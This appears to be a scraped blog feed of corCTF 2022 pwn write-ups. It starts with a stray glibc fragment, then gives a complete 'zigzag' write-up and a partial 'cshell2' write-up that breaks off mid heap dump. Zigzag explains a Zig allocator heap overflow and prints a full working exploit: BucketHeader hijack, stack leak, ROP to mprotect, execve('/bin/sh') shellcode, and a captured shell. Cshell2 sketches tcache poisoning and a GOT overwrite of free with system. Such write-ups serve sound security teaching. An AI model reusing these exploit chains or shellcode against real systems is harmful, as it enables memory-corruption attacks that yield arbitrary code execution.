x First is computed the amount of bytes that contains the read buffer (have). If we do not have the right amount of bytes within the read buffer we first try to copy data from the read buffer. Then we check we are mapping the whole file (and not only a part of it) with the use of mmap_remap_check (to avoid useless code I put it directly after the implementation of _IO_file_xsgetn_mmap), if it fails the file is unmapped and the vanilla file operations is used to read data from the file.

[corCTF 2022 - pwn] zigzag

Mon, 08 Aug 2022 00:00:00 GMT

Introduction

zigzag is a zig heap challenge I did during the corCTF 2022 event. It was pretty exotic given we have to pwn a heap like challenge written in zig. It is not using the C allocator but instead it uses the GeneralPurposeAllocator, which makes the challenge even more interesting. Find the tasks here.

TL; DR

Understanding zig GeneralPurposeAllocator internals
Hiijack the BucketHeader of a given bucket to get a write what were / read what where primitive.
Leak stack + ROP on the fileRead function (mprotect + shellcode)
PROFIT

Source code analysis

The source code is procided:

// zig build-exe main.zig -O ReleaseSmall
// built with zig version: 0.10.0-dev.2959+6f55b294f

const std = @import("std");
const fmt = std.fmt;

const stdout = std.io.getStdOut().writer();
const stdin = std.io.getStdIn();

const MAX_SIZE: usize = 0x500;
const ERR: usize = 0xbaad0000;
const NULL: usize = 0xdead0000;

var chunklist: [20][]u8 = undefined;

var gpa = std.heap.GeneralPurposeAllocator(.{}){};
const allocator = gpa.allocator();

pub fn menu() !void {
    try stdout.print("[1] Add\n", .{});
    try stdout.print("[2] Delete\n", .{});
    try stdout.print("[3] Show\n", .{});
    try stdout.print("[4] Edit\n", .{});
    try stdout.print("[5] Exit\n", .{});
    try stdout.print("> ", .{});
}

pub fn readNum() !usize {
    var buf: [64]u8 = undefined;
    var stripped: []const u8 = undefined;
    var amnt: usize = undefined;
    var num: usize = undefined;

    amnt = try stdin.read(&buf);
    stripped = std.mem.trimRight(u8, buf[0..amnt], "\n");

    num = fmt.parseUnsigned(usize, stripped, 10) catch {
        return ERR;
    };

    return num;
}

pub fn add() !void {
    var idx: usize = undefined;
    var size: usize = undefined;

    try stdout.print("Index: ", .{});
    idx = try readNum();

    if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) != NULL) {
        try stdout.print("Invalid index!\n", .{});
        return;
    }

    try stdout.print("Size: ", .{});
    size = try readNum();

    if (size == ERR or size >= MAX_SIZE) {
        try stdout.print("Invalid size!\n", .{});
        return;
    }

    chunklist[idx] = try allocator.alloc(u8, size);

    try stdout.print("Data: ", .{});
    _ = try stdin.read(chunklist[idx]);
}

pub fn delete() !void {
    var idx: usize = undefined;

    try stdout.print("Index: ", .{});
    idx = try readNum();

    if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) == NULL) {
        try stdout.print("Invalid index!\n", .{});
        return;
    }

    _ = allocator.free(chunklist[idx]);

    chunklist[idx].ptr = @intToPtr([*]u8, NULL);
    chunklist[idx].len = 0;
}

pub fn show() !void {
    var idx: usize = undefined;

    try stdout.print("Index: ", .{});
    idx = try readNum();

    if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) == NULL) {
        try stdout.print("Invalid index!\n", .{});
        return;
    }

    try stdout.print("{s}\n", .{chunklist[idx]});
}

pub fn edit() !void {
    var idx: usize = undefined;
    var size: usize = undefined;

    try stdout.print("Index: ", .{});
    idx = try readNum();

    if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) == NULL) {
        try stdout.print("Invalid index!\n", .{});
        return;
    }

    try stdout.print("Size: ", .{});
    size = try readNum();

    if (size > chunklist[idx].len and size == ERR) {
        try stdout.print("Invalid size!\n", .{});
        return;
    }

    chunklist[idx].len = size;

    try stdout.print("Data: ", .{});
    _ = try stdin.read(chunklist[idx]);
}

pub fn main() !void {
    var choice: usize = undefined;

    for (chunklist) |_, i| {
        chunklist[i].ptr = @intToPtr([*]u8, NULL);
        chunklist[i].len = 0;
    }

    while (true) {
        try menu();

        choice = try readNum();
        if (choice == ERR) continue;

        if (choice == 1) try add();
        if (choice == 2) try delete();
        if (choice == 3) try show();
        if (choice == 4) try edit();
        if (choice == 5) break;
    }
}

The source code is quite readable, the vulnerability is the overflow within the edit function. The check onto the provided size isn't efficient, size > chunklist[idx].len and size == ERR, if size > chunklist[idx].len and if size != ERR the condition is false. Which means we can edit the chunk by writing an arbitrary amount of data in it.

GeneralPurposeAllocator abstract

The zig source is quite readable so let's take a look at the internals of the GeneralPurposeAllocator allocator. The GeneralPurposeAllocator is implemented here. The header of the source code file gives the basic design of the allocator:

//! ## Basic Design:
//!
//! Small allocations are divided into buckets:
//!
//! ```
//! index obj_size
//! 0     1
//! 1     2
//! 2     4
//! 3     8
//! 4     16
//! 5     32
//! 6     64
//! 7     128
//! 8     256
//! 9     512
//! 10    1024
//! 11    2048
//! ```
//!
//! The main allocator state has an array of all the "current" buckets for each
//! size class. Each slot in the array can be null, meaning the bucket for that
//! size class is not allocated. When the first object is allocated for a given
//! size class, it allocates 1 page of memory from the OS. This page is
//! divided into "slots" - one per allocated object. Along with the page of memory
//! for object slots, as many pages as necessary are allocated to store the
//! BucketHeader, followed by "used bits", and two stack traces for each slot
//! (allocation trace and free trace).
//!
//! The "used bits" are 1 bit per slot representing whether the slot is used.
//! Allocations use the data to iterate to find a free slot. Frees assert that the
//! corresponding bit is 1 and set it to 0.
//!
//! Buckets have prev and next pointers. When there is only one bucket for a given
//! size class, both prev and next point to itself. When all slots of a bucket are
//! used, a new bucket is allocated, and enters the doubly linked list. The main
//! allocator state tracks the "current" bucket for each size class. Leak detection
//! currently only checks the current bucket.
//!
//! Resizing detects if the size class is unchanged or smaller, in which case the same
//! pointer is returned unmodified. If a larger size class is required,
//! `error.OutOfMemory` is returned.
//!
//! Large objects are allocated directly using the backing allocator and their metadata is stored
//! in a `std.HashMap` using the backing allocator.

Let's take a look at alloc function:

fn alloc(self: *Self, len: usize, ptr_align: u29, len_align: u29, ret_addr: usize) Error![]u8 {
    self.mutex.lock();
    defer self.mutex.unlock();

    if (!self.isAllocationAllowed(len)) {
        return error.OutOfMemory;
    }

    const new_aligned_size = math.max(len, ptr_align);
    if (new_aligned_size > largest_bucket_object_size) {
        try self.large_allocations.ensureUnusedCapacity(self.backing_allocator, 1);
        const slice = try self.backing_allocator.rawAlloc(len, ptr_align, len_align, ret_addr);

        const gop = self.large_allocations.getOrPutAssumeCapacity(@ptrToInt(slice.ptr));
        if (config.retain_metadata and !config.never_unmap) {
            // Backing allocator may be reusing memory that we're retaining metadata for
            assert(!gop.found_existing or gop.value_ptr.freed);
        } else {
            assert(!gop.found_existing); // This would mean the kernel double-mapped pages.
        }
        gop.value_ptr.bytes = slice;
        if (config.enable_memory_limit)
            gop.value_ptr.requested_size = len;
        gop.value_ptr.captureStackTrace(ret_addr, .alloc);
        if (config.retain_metadata) {
            gop.value_ptr.freed = false;
            if (config.never_unmap) {
                gop.value_ptr.ptr_align = ptr_align;
            }
        }

        if (config.verbose_log) {
            log.info("large alloc {d} bytes at {*}", .{ slice.len, slice.ptr });
        }
        return slice;
    }

    const new_size_class = math.ceilPowerOfTwoAssert(usize, new_aligned_size);
    const ptr = try self.allocSlot(new_size_class, ret_addr);
    if (config.verbose_log) {
        log.info("small alloc {d} bytes at {*}", .{ len, ptr });
    }
    return ptr[0..len];
}

First in alloc, if the aligned size is not larger than the largest bucket capacity (2**11) it will call allocSlot.

fn allocSlot(self: *Self, size_class: usize, trace_addr: usize) Error![*]u8 {
    const bucket_index = math.log2(size_class);
    const first_bucket = self.buckets[bucket_index] orelse try self.createBucket(
        size_class,
        bucket_index,
    );
    var bucket = first_bucket;
    const slot_count = @divExact(page_size, size_class);
    while (bucket.alloc_cursor == slot_count) {
        const prev_bucket = bucket;
        bucket = prev_bucket.next;
        if (bucket == first_bucket) {
            // make a new one
            bucket = try self.createBucket(size_class, bucket_index);
            bucket.prev = prev_bucket;
            bucket.next = prev_bucket.next;
            prev_bucket.next = bucket;
            bucket.next.prev = bucket;
        }
    }
    // change the allocator's current bucket to be this one
    self.buckets[bucket_index] = bucket;

    const slot_index = bucket.alloc_cursor;
    bucket.alloc_cursor += 1;

    var used_bits_byte = bucket.usedBits(slot_index / 8);
    const used_bit_index: u3 = @intCast(u3, slot_index % 8); // TODO cast should be unnecessary
    used_bits_byte.* |= (@as(u8, 1) << used_bit_index);
    bucket.used_count += 1;
    bucket.captureStackTrace(trace_addr, size_class, slot_index, .alloc);
    return bucket.page + slot_index * size_class;
}

allocSlot will check if the current bucket is able to allocate one more object, else it will iterate through the doubly linked list to look for a not full bucket. And if it does nto find one, it creates a new bucket. When the bucket is allocated, it returns the available objet at bucket.page + slot_index * size_class.

As you can see, the BucketHeader is structured like below in the createBucket function:

fn createBucket(self: *Self, size_class: usize, bucket_index: usize) Error!*BucketHeader {
    const page = try self.backing_allocator.allocAdvanced(u8, page_size, page_size, .exact);
    errdefer self.backing_allocator.free(page);

    const bucket_size = bucketSize(size_class);
    const bucket_bytes = try self.backing_allocator.allocAdvanced(u8, @alignOf(BucketHeader), bucket_size, .exact);
    const ptr = @ptrCast(*BucketHeader, bucket_bytes.ptr);
    ptr.* = BucketHeader{
        .prev = ptr,
        .next = ptr,
        .page = page.ptr,
        .alloc_cursor = 0,
        .used_count = 0,
    };
    self.buckets[bucket_index] = ptr;
    // Set the used bits to all zeroes
    @memset(@as(*[1]u8, ptr.usedBits(0)), 0, usedBitsCount(size_class));
    return ptr;
}

It allocates a page to store objects in, then it allocates the BucketHeader itself. Note that the page allocator will make allocations adjacent from each other. According to my several experiments the allocations grow -- from an initial given mapping -- to lower or higher addresses. I advice you to try different order of allocations in gdb to figure out this.

Let's quickly decribe each field of the BucketHeader:

.prev and .next keep track of the doubly linked list that links buckets of same size.
.page contains the base address of the page that contains the objects that belong to the bucket.
alloc_cursor contains the number of allocated objects.
used_count contains the number of currently used objects.

Getting read / write what were primitive

Well, the goal is to an arbitrary read / write by hiijacking the .page and .alloc_cursor fields of the BucketHeader, this way if we hiijack pointers from a currently used bucket for a given size we can get a chunk toward any location.

What we can do to get a chunk close to a BucketHeader structure would be:

Allocate large (0x500-1) chunk, 0x800 bucket.
Allocate 4 other chunks of size 1000, which end up in the 0x400 bucket.

Thus, first one page has been allocated to satisfy request one, then another page right after the other has been allocated to store the BucketHeader for this bucket. Then, to satisfy the four next allocations, the page that stores the objects has been allocated right after the one which stores the BucketHeader of the 0x800-bucket, and finally a page is allocated to store the BucketHeader of the 0x400 bucket.

If you do not understand clearly, I advice you to debug my exploit in gdb by looking at the chunklist.

With this process the last allocated 0x400-sized chunk gets allocated 0x400 bytes before the BucketHeader of the bucket that handles 0x400-sized chunks. Thus to get a read / write what were we can simply trigger the heap overflow with the edit function to null out .alloc_cursor and .used_count and replace .page by the target location. This way the next allocation that will request 0x400 bytes, which will trigger the hiijacked bucket and return the target location giving us the primitive.

Which gives:

alloc(0, 0x500-1, b"A")
for i in range(1, 5):
    alloc(i, 1000, b"vv")

edit(4, 0x400 + 5*8, b"X"*0x400 \ # padding
     + pwn.p64(0x208000)*3 \ # next / prev + .page point toward the target => 0x208000
     + pwn.p64(0x0) \ # .alloc_cursor & .used_count
     + pwn.p64(0)) # used bits

# next alloc(1000) will trigger the write what were

Leak stack

To leak the stack I leaked the argv variable that contains a pointer toward arguments given to the program, stored on the stack. That's a reliable leak given it's a known and fixed location, which can base used as a base compared with function's stackframes.

alloc(5, 1000, b"A") # get chunk into target location (0x208000)
show(5)
io.recv(0x100) # argv is located at 0x208000 + 0x100

stack = pwn.u64(io.recv(8))
pwn.log.info(f"stack: {hex(stack)}")

ROP

Now we're able to overwrite whatever function's stackframe, we have to find one that returns from context of std.fs.file.File.read that reads the user input to the chunk. But unlucky functions like add, edit are inlined in the main function. Moreover we cannot overwrite the return address of the main function given that the exit handler call directly exit. Which means we have to corrput the stackframe of the std.fs.file.File.read function called in the edit function. But the issue is that between the call to SYS_read within std.fs.file.File.read and the end of the function, variables that belong to the calling function's stackframe are edited, corrupting the ROPchain. So what I did is using this gadget to reach a part of the stack that will not be corrupted:

0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret

With the use of this gadget I'm able to pop a few QWORD from the stack to reach another area of the stack where I write my ROPchain. The goal for the ROPchain is to mptotect a shellcode and then jump on it. The issue is that I didn't find a gadget to control the value of the rdx register but when it returns from std.fs.file.File.read it contains the value of size given to edit. So to call mprotect(rdi=0x208000, rsi=0x1000, rdx=0x7) we have to call edit with a size of 7 to write on the std.fs.file.File.read saved RIP the value of the magic gadget seen previously.

Here is the ROPchain:

edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(0x208000)*3 + pwn.p64(0x000) + pwn.p64(0))
# with the use of the write what were we write the shellcode at 0x208000

shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
# execve("/bin/sh", NULL, NULL)

alloc(14, 1000, shellcode)

"""
0x0000000000201fcf : pop rax ; syscall
0x0000000000203147 : pop rdi ; ret
0x000000000020351b : pop rsi ; ret
0x00000000002035cf : xor edx, edx ; mov rsi, qword ptr [r9] ; xor eax, eax ; syscall
0x0000000000201e09 : ret
0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret
"""

edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0x50)* 3 + pwn.p64(0) + pwn.p64(0))
# write ROPchain into the safe area on the stack 
alloc(11, 0x400, pwn.p64(0x203147) \ # pop rdi ; ret
        + pwn.p64(0x208000) + \ # target area for the shellcode
        pwn.p64(0x20351b) + \ # pop rsi ; ret
        pwn.p64(0x1000) + \ # length
        pwn.p64(0x201fcf) + \ # pop rax ; syscall
        pwn.p64(0xa) + \ # SYS_mprotect
        pwn.p64(0x208000)) # jump on the shellcode + PROFIT

edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0xd0)* 3 + pwn.p64(0) + pwn.p64(0))

alloc(12, 1000, pwn.p64(0x202d16)) # valid return address
edit(12, 0x7, pwn.p64(0x0000000000203715)) # magic gadget

io.interactive()

PROFIT

nasm@off:~/Documents/pwn/corCTF/zieg$ python3 remote.py REMOTE HOST=be.ax PORT=31278
[*] '/home/nasm/Documents/pwn/corCTF/zieg/zigzag'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x200000)
[+] Opening connection to be.ax on port 31278: Done
[*] stack: 0x7ffc2ca48ae8
[*] Loaded 37 cached gadgets for 'zigzag'
[*] Using sigreturn for 'SYS_execve'
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls
flag.txt
zigzag
$ cat flag.txt
corctf{bl4Z1nGlY_f4sT!!}

Appendices

Final exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn


# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('zigzag')
# pwn.context.terminal = ['tmux', 'new-window'] 
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False

host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)


def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)


gdbscript = '''
source ~/Downloads/pwndbg/gdbinit.py
'''.format(**locals())

io = None

io = start()

def alloc(idx, size, data):
    io.sendlineafter(b"> ", b"1")
    io.sendlineafter(b"Index: ", str(idx).encode())
    io.sendlineafter(b"Size: ", str(size).encode())
    io.sendlineafter(b"Data: ", data)


def delete(idx):
    io.sendlineafter(b"> ", b"2")
    io.sendlineafter(b"Index: ", str(idx).encode())

def show(idx):
    io.sendlineafter(b"> ", b"3")
    io.sendlineafter(b"Index: ", str(idx).encode())

def edit(idx, size, data):
    io.sendlineafter(b"> ", b"4")
    io.sendlineafter(b"Index: ", str(idx).encode())
    io.sendlineafter(b"Size: ", str(size).encode())
    io.sendlineafter(b"Data: ", data)

alloc(0, 0x500-1, b"A")
for i in range(1, 5):
    alloc(i, 1000, b"vv")

edit(4, 0x400 + 5*8, b"X"*0x400 + pwn.p64(0x208000)*3 + pwn.p64(0x000) + pwn.p64(0))

alloc(5, 1000, b"A")
show(5)
io.recv(0x100)

stack = pwn.u64(io.recv(8))
pwn.log.info(f"stack: {hex(stack)}")

edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(0x208000)*3 + pwn.p64(0x000) + pwn.p64(0))

shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

alloc(14, 1000, shellcode)

"""
0x0000000000201fcf : pop rax ; syscall
0x0000000000203147 : pop rdi ; ret
0x000000000020351b : pop rsi ; ret
0x00000000002035cf : xor edx, edx ; mov rsi, qword ptr [r9] ; xor eax, eax ; syscall
0x0000000000201e09 : ret
0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret
"""

rop = pwn.ROP(exe)
binsh = 0x208000+(48)
rop.execve(binsh, 0, 0)

edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0x50)* 3 + pwn.p64(0) + pwn.p64(0))
alloc(11, 0x400, pwn.p64(0x203147) + pwn.p64(0x208000) + pwn.p64(0x20351b) + pwn.p64(0x1000) + pwn.p64(0x201fcf) + pwn.p64(0xa) + pwn.p64(0x208000))

edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0xd0)* 3 + pwn.p64(0) + pwn.p64(0))

alloc(12, 1000,pwn.p64(0x202d16))
edit(12, 0x7, pwn.p64(0x0000000000203715))

io.interactive()

"""
nasm@off:~/Documents/pwn/corCTF/zieg$ python3 remote.py REMOTE HOST=be.ax PORT=31278
[*] '/home/nasm/Documents/pwn/corCTF/zieg/zigzag'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x200000)
[+] Opening connection to be.ax on port 31278: Done
[*] stack: 0x7ffe21d2cc68
[*] Loaded 37 cached gadgets for 'zigzag'
[*] Using sigreturn for 'SYS_execve'
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ cat flag.txt
corctf{bl4Z1nGlY_f4sT!!}
"""

[corCTF 2022 - pwn] cshell2

Sun, 07 Aug 2022 00:00:00 GMT

Introduction

cshell2 is a heap challenge I did during the corCTF 2022 event. It was pretty classic so I will not describe a lot. If you begin with heap challenges, I advice you to read previous heap writeup.

TL; DR

Fill tcache.
Heap overflow in edit on the bio field which allows to leak the address of the unsortedbin.
Leak heap and defeat safe-linking to get an arbitrary write through tcache poisoning.
Hiijack GOT entry of free to system.
Call free("/bin/sh").
PROFIT

Reverse Engineering

Let's take a look at the provided binary and libc:

$ ./libc.so.6 
GNU C Library (GNU libc) development release version 2.36.9000.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 12.1.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
Minimum supported kernel: 3.2.0
For bug reporting instructions, please see:
<https://www.gnu.org/software/libc/bugs.html>.
$ checksec --file cshell2
[*] '/home/nasm/Documents/pwn/corCTF/cshell2/cshell2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3fb000)
    RUNPATH:  b'.'

A very recent libc plus a non PIE-based binary without FULL RELRO. Thus we could think to some GOT hiijacking stuff directly on the binary. Let's take a look at the add function:

unsigned __int64 add()
{
  int idx_1; // ebx
  unsigned __int8 idx; // [rsp+Fh] [rbp-21h] BYREF
  size_t size; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v4; // [rsp+18h] [rbp-18h]

  v4 = __readfsqword(0x28u);
  puts("Enter index: ");
  __isoc99_scanf("%hhu", &idx);
  puts("Enter size (1032 minimum): ");
  __isoc99_scanf("%lu", &size);
  if ( idx > 0xEu || size <= 0x407 || size_array[2 * idx] )
  {
    puts("Error with either index or size...");
  }
  else
  {
    idx_1 = idx;
    chunk_array[2 * idx_1] = (chunk_t *)malloc(size);
    size_array[2 * idx] = size;
    puts("Successfuly added!");
    puts("Input firstname: ");
    read(0, chunk_array[2 * idx], 8uLL);
    puts("Input middlename: ");
    read(0, chunk_array[2 * idx]->midName, 8uLL);
    puts("Input lastname: ");
    read(0, chunk_array[2 * idx]->lastName, 8uLL);
    puts("Input age: ");
    __isoc99_scanf("%lu", &chunk_array[2 * idx]->age);
    puts("Input bio: ");
    read(0, chunk_array[2 * idx]->bio, 0x100uLL);
  }
  return v4 - __readfsqword(0x28u);
}

It creates a chunk by asking several fields but nothing actually interesting there. Let's take a look at the show function:

unsigned __int64 show()
{
  unsigned __int8 v1; // [rsp+7h] [rbp-9h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Enter index: ");
  __isoc99_scanf("%hhu", &v1);
  if ( v1 <= 0xEu && size_array[2 * v1] )
    printf(
      "Name\n last: %s first: %s middle: %s age: %d\nbio: %s",
      chunk_array[2 * v1]->lastName,
      chunk_array[2 * v1]->firstName,
      chunk_array[2 * v1]->midName,
      chunk_array[2 * v1]->age,
      chunk_array[2 * v1]->bio);
  else
    puts("Invalid index");
  return v2 - __readfsqword(0x28u);
}

It prints a chunk only if it's allocated (size entry initialized in the size array) and if the index is right. Then the delete function:

unsigned __int64 delete()
{
  unsigned __int8 v1; // [rsp+7h] [rbp-9h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("Enter index: ");
  __isoc99_scanf("%hhu", &v1);
  if ( v1 <= 0xEu && size_array[2 * v1] )
  {
    free(chunk_array[2 * v1]);
    size_array[2 * v1] = 0LL;
    puts("Successfully Deleted!");
  }
  else
  {
    puts("Either index error or trying to delete something you shouldn't be...");
  }
  return v2 - __readfsqword(0x28u);
}

Quite common delete handler, it prevents double free. The vulnerability is in the edit function:

unsigned __int64 edit()
{
  unsigned __int8 idx; // [rsp+7h] [rbp-9h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("Enter index: ");
  __isoc99_scanf("%hhu", &idx);
  if ( idx <= 0xEu && size_array[2 * idx] )
  {
    puts("Input firstname: ");
    read(0, chunk_array[2 * idx], 8uLL);
    puts("Input middlename: ");
    read(0, chunk_array[2 * idx]->midName, 8uLL);
    puts("Input lastname: ");
    read(0, chunk_array[2 * idx]->lastName, 8uLL);
    puts("Input age: ");
    __isoc99_scanf("%lu", &chunk_array[2 * idx]->age);
    printf("Input bio: (max %d)\n", size_array[2 * idx] - 32LL);
    read(0, chunk_array[2 * idx]->bio, size_array[2 * idx] - 32LL);
    puts("Successfully edit'd!");
  }
  return v2 - __readfsqword(0x28u);
}

It reads size_array[2 * idx] - 32LL bytes into a 0x100-sized buffer which leads to a heap overflow.

Exploitation

There is no actual issue, we can allocate whatever chunk bigger than 0x407, the only fancy thing we have to do would be to defeat safe-linking to get an arbitrary write with a tcache poisoning attack on the 0x410 tcache bin. Here is the attack I led against the challenge but that's not the most optimized.

The plan is to:

Allocate two 0x408-sized chunks : pivot and victim, in order to easily get later libc leak.
Allocate 9 more chunks and then fill the 0x410 tcachebin with them (with only 7 of them).
Delete victim and overflow pivot up to the next free pointer of victim to get a libc leak.
Allocate a 0x408-sized chunk to get the 8-th chunk (within chunk_array) which is on the top of the bin.
Leak the heap same way as for libc, but we have to defeat safe-linking.
Delete the 9-th chunk to put it in the tcachebin at the first position.
Then we can simply edit chunk 8 and overflow over chunk 9 to poison its next fp to hiijack it toward the GOT entry of free.
Pop chunk 9 from the freelist and then request another the target memory area : the GOT entry of free.
Write system into the GOT entry of free.
Free whatever chunk for which //bin/sh is written at the right begin.
PROFIT.

To understand the attack process I'll show the heap state at certain part of the attack.

Libc / heap leak

First we have to fill the tcache. We allocate a chunk right after chunk0 we do not put into the tcache to be able to put it in the unsortedbin to make appear unsortedbin's address:

add(0, 1032, b"//bin/sh\x00", b"", b"", 1337, b"") # pivot
add(1, 1032, b"", b"", b"", 1337, b"") # victim

for i in range(2, 7+2 + 2):
    add(i, 1032, b"", b"", b"", 1337, b"")

for i in range(2, 7+2):
    delete(i)

delete(1)
edit(0, b"", b"", b"", 1337, b"Y"*(1032 - 64 + 7))

show(0)
io.recvuntil(b"Y"*(1032 - 64 + 7) + b"\n")
libc.address = pwn.u64(io.recvuntil(b"1 Add\n")[:-6].ljust(8, b"\x00")) - 0x1c7cc0
pwn.log.info(f"libc: {hex(libc.address)}")

# Heap state:
"""
0x1de1290	0x0000000000000000	0x0000000000000411	................ [chunk0]
0x1de12a0	0x68732f6e69622f0a	0x0000000000000a0a	./bin/sh........
0x1de12b0	0x000000000000000a	0x0000000000000539	........9.......
0x1de12c0	0x0000000000000000	0x0000000000000000	................
0x1de12d0	0x0000000000000000	0x0000000000000000	................
0x1de12e0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de12f0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1300	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1310	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1320	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1330	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1340	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1350	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1360	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1370	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1380	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1390	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de13a0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de13b0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de13c0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de13d0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de13e0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de13f0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1400	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1410	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1420	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1430	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1440	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1450	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1460	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1470	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1480	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1490	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de14a0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de14b0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de14c0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de14d0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de14e0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de14f0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1500	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1510	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1520	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1530	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1540	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1550	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1560	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1570	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1580	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1590	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de15a0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de15b0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de15c0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de15d0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
